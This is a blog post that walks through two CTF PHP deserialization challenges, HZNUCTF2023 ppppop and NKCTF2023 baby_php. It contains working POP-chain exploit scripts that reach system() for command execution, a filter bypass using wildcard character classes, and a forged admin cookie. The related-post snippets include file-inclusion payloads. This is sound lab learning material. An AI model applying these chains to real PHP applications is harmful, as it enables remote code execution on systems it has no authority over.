PHP反序列的两道题

已于 2023-03-28 19:29:47 修改
阅读量455 收藏
点赞数
分类专栏: 刷题笔记 文章标签: php web安全 经验分享
于 2023-03-28 19:01:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44640313/article/details/129821028
版权

 HZNUCTF2023-ppppop

参考博客:HZNUCTF2023初赛 (yuque.com)

初赛WriteUp (yuque.com)

打开页面,没有什么东西,抓个包看看(dir一下网站就崩了。。。。)

发现在cookie那里存在一串貌似base64的编码,解码看看是一串序列化后的字符串

直接将isAdmin后面的b:0 改成b:1 伪造身份为admin刷新页面之后源码会高亮出来

成功显示页面源码

<?php
error_reporting(0);
include('utils.php');

class A {
    public $className;
    public $funcName;
    public $args;

    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}

if(checkUser()) {
    highlight_file(__FILE__);
    $payload = strrev(base64_decode($_POST['payload']));
    unserialize($payload);
}

发现这就是一个很简单的php反序列化,链子很简单,其实就是想用A类来调用某个类的某个方法,链子为:__destruct() => __call()

构造exp为

<?php
class A {
    public $className="B";
    public $funcName="system";
    public $args="ls /";  //最后发现flag是在env环境变量中的

}

$a=new A();
$b=base64_encode(strrev(serialize($a)));
echo $b;

?>

nkctf2023-baby_php

参考博客:NKCTF2023&数字人才挑战赛web部分wp - 码农教程 (manongjc.com)

NKCTF2023 web部分wp_丨Arcueid丨的博客-CSDN博客

源码:
<?php
    error_reporting(0);
    class Welcome{
        public $name;
        public $arg = 'oww!man!!';
        public function __construct(){
            $this->name = 'ItS SO CREAZY';
        }
        public function __destruct(){
            if($this->name == 'welcome_to_NKCTF'){
                echo $this->arg;
            }
        }
    }

    function waf($string){
        if(preg_match('/f|l|a|g|\*|\?/i', $string)){
            die("you are bad");
        }
    }
    class Happy{
        public $shell;
        public $cmd;
        public function __invoke(){
            $shell = $this->shell;
            $cmd = $this->cmd;
            waf($cmd);
            eval($shell($cmd));
        }
    }
    class Hell0{
        public $func;
        public function __toString(){
            $function = $this->func;
            $function();
        }
    }

    if(isset($_GET['p'])){
        unserialize($_GET['p']);
    }else{
        highlight_file(__FILE__);
    }
?>

打开环境是一道php反序列化题,开始源码审计

搞出pop链,链子__destruct()->__toString()->__invoke()

这里过滤了f ,l, a,g所以导致我们无法使用ls查看文件目录

但是dir没有杯ban所以这里可以使用dir来进行查看目录

查看目录后flag在/f1ag,然后*?也被禁了

方法一:more类似于env ,[0-z]等于* ,直接使用[a-z]进行通配匹配
more /[0-z]1[0-z][0-z]

exp:
<?php
error_reporting(0);
class Welcome{
    public $name;
    public $arg ;

}


class Happy{
    public $shell;
    public $cmd;

}
class Hell0{
    public $func;

}
$a=new Welcome();
$a->arg='welcome_to_NKCTF';
$a->name=new Hell0();
$a->name->func=new Happy();
$a->name->func->shell="system";
$a->name->func->cmd="more /[0-z]1[0-z][0-z]"; 
echo serialize($a);
?>

方法二:urldecode来绕

参考一个师傅的解法

NKCTF2023 web部分wp_丨Arcueid丨的博客-CSDN博客

0e1G7
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
web安全-PHP反序列化漏洞
weixin_61956136的博客
07-10 2064
web安全-PHP反序列化漏洞
CTFSHOW卷王杯 easy unserialize
Landasika的博客
05-17 1304
<?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" &&am...
深入了解PHP反序列化原生类
we
06-05 1431
如果在代码审计或者ctf中,有反序列化的功能点,但是却不能构造出完整的pop链,那这时我们应该如何破局呢?我们可以尝试一下从php原生类下手,php有些原生类中内置一些魔术方法,如果我们巧妙构造可控参数,触发并利用其内置魔术方法,就有可能达到一些我们想要的目的。1234567891011我们采用下面脚本遍历一下所有原生类中的魔术方法 Error/ExceptionError 是所有PHP内部错误类的基类。 (PHP 7, 8)**Error::__toString ** error 的字符串表达返回
浅谈PHP中GC回收机制的利用
errorr0
03-16 2295
GC回收及机制,在ctf中不会单独涉及,但是会糅合起来一起考!
2021-10-3 安全笔记周报(php 反序列化两道)(待更新)
m0_54481455的博客
10-03 4612
Moectf2021 easyunserialize <?php classentrance { public$start; function__construct($start) { $this->start=$start; } function__destruct() { $this->start->helloworld(); } } c...
【无标
weixin_51387754的博客
09-08 447
ctf可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得数。为了方便称呼,我们把这样的内容称之为“Flag”。
php代码-ctf payload 第九 反序列化 do you know robot
07-15
第九的标暗示我们需要理解并利用PHP反序列化机制来解决这个问PHP是一种广泛使用的服务器端脚本语言,其在处理序列化和反序列化数据时可能存在安全风险。 序列化是将对象的状态转换为可存储或传输的数据...
PHP面向对象面试.pdf
10-10
- `__wakeup`:在对象被反序列化时调用,可用于重新初始化资源。 - `__toString`:当尝试将对象转换为字符串时调用,例如在`echo`或`print`语句中。 - `__set_state`:当`var_export`函数导出对象时调用,返回一...
PHP工程师面试笔试真(某知名旅游服务商)-附解析.doc
11-25
- 第16:`serialize()`和`unserialize()`函数可以用来序列化和反序列化对象,从而保存和恢复类的状态。 - 第17PHP变量名必须以字母或下划线开头,后续可跟字母、数字或下划线,区大小写,不能是PHP的保留...
PHP反序列化&魔术方法&原生类(二)
m0_63917373的博客
11-16 362
PHP反序列化 魔术方法 原生类
PHP 原生类学习与利用
snowlyzz的博客
09-22 1380
php 原生类利用与学习。
HZNUCTF2023 web
最新发布
weixin_63231007的博客
05-07 1466
HZNUCTF校赛 赛后复现
HZNUCTF-ezflask
qq_44640313的博客
03-27 573
jinja2的注入
NKCTF[eazy_baby_apk](DES名字的AES
can_no_volcano的博客
03-26 215
下文发现MD5加密的confusion,所以我们对其进行MD5加密再充当填充物,最后看解密代码。key1中的e全部用3代替可以得到第一种填充 r3v3rs3car3fully。key1是偏移量,所以vector2就是密钥 ,再对其AES加密可得flag。由此估计,这就是密文。我们对其进行DES解密发现解密不出来,所以继续看代码。找到主要函数部,一看就是一堆提示信息,向AES加密和DES。接着往下看vector2的内容。apk文件用jadx打开。
NKCTF baby_php wp
Elite的博客
03-31 335
我们需要打开f1ag文件,获取flag,查看当前目录的话,会发现一个叫做ooo.txt的文件,里面放着根目录列表。经析,所传入的$string字符串不能含有f l a g *?中的任何字符,并且不大小写。ls指令无法使用,其中含有字符l,我们可以使用dir替代。也就是说所传入的内圈函数要绕过此正则。$cmd变量对应$string。
[NKCTF2023]web/misc/blockchain-wp
qq_63923205的博客
03-27 1096
NKCTF WP
CTFWeb-BUUCTF竞赛真WriteUp(1)
道阻且长,行则将至。
08-20 7847
BUUCTF (北京联合大学CTF)平台拥有大量免费的 CTF 比赛真环境: 此处记录下部 Web 目练习过程。 N0.1 强网杯-高明的黑客 1、创建并访问靶机: 2、根据目提示,访问并下载 www.tar.gz: 打开压缩包,发现有3000多个php文件,尝试搜索flag文件,未果。于是打开php文件进行代码审计,发现代码中存在大量使用 system()/eval()/assert() 等函数执行 get 或 post 传递的参数,这意味我们也许可以通过传递参数的方式来执行任意命令。
ctfshow文件包含-超详解
qq_50589021的博客
08-05 1965
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
ctf php沙箱,详谈CTF中常出现的PHP反序列化漏洞
weixin_39968724的博客
03-16 1003
0x01什么是PHP序列化与反序列化PHP序列化是一种把变量或对象以字符串形式转化以方便储存和传输的方法在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。比方来说,我现在有一个类,我需要通过接口进行数据传输,或存储至数据库中以备将来使用,同时又想保持其结构,让接收方接收或数据库读数据时恢复其原来的结构,就需要通过序列化将对象按照一定格式转化为字符串的形式来进行传输简单...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值